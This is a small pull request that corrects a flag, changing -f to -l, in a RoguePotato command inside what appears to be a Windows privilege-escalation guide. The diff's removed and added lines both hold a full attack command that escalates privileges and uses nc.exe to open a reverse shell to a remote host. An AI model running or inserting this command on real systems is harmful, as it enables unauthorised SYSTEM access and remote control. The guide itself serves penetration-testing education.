### PR TITLE
Update roguepotato-and-printspoofer.md

### DIFF
--- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -38,7 +38,7 @@ NULL
 ### RoguePotato
 
 ```bash
-c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
+c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
 ```
 
 ### SharpEfsPotato


### PR DESCRIPTION
Change the -f flag for RoguePotato.exe to -l. 
The -f flag doesn't exist in the RoguePotato.exe program. Valid flag for specifying the listening port is -l.